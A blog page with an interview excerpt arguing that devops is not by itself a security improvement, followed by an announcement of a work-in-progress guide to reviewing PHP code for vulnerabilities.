The Myth of Devops as a Catalyst to Improve Security

Did an interview with George Hulme about Devops and Security


Muntner: Thinking security testing through and automating as much as possible will yield results, but that can happen with or without devops. I’m not saying devops is invalid, rather that it alone is not responsible for good outcomes. Thinking that an approach delivers more than it really does is only a false sense of security, arguably worse than awareness of insufficient security.

Secure systems and software development practices like command-safe APIs, network-layer features in TLS, HTTP layer features like CSP, improvements in application and protocol layer firewalls, developers learning to do proper encoding for the appropriate output context, automated testing with tools like OWASP ZAP or commercial equivalents as appropriate for the type of application are all high-impact but have nothing to do with devops. Security should be part of the flow, an integral
 part of QA, security and functional testing.

Muntner: Security isn’t a state, it’s a process. It’s a verb, not a noun. Security ‘what’ should be part of the workflow? Security activities and tests, personnel, all of the above? Should a security organization report to the business management and governance side of management, or the technical side? And why is DevOps better for security maturity than separation of duties?


How To Review PHP Code for Vulnerabilities

This document will, when completed, be intended to help PHP developers learn to review code for security issues, and to help experienced code reviewers evaluate PHP applications faster, better, and more repeatably.

My preferences favor open source softwar. As far as IDE’s go, I have found Eclipse to be a very powerful code review tool. I’ve started documenting the process of configuring and using it, in a task-focused way, to assist the reviewer to perform common code review activities.

The page linked below will be regularly updated as I write more, and as I incorporate suggestions from others. It will probably finally reside on a Mozilla Developer Network page.

If you can suggest changes or additions to the doc above, please comment below. Thanks!